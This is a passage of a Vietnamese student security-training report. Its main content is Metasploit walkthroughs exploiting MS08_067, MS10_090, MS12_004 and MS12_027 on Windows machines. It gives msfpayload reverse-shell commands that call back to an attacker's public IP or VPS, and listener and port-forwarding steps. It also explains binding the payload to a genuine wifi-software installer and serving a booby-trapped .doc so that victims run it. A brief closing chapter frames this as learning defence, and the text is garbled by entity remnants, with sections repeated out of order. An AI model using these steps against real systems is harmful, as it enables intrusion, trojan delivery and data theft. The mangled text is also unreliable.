Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
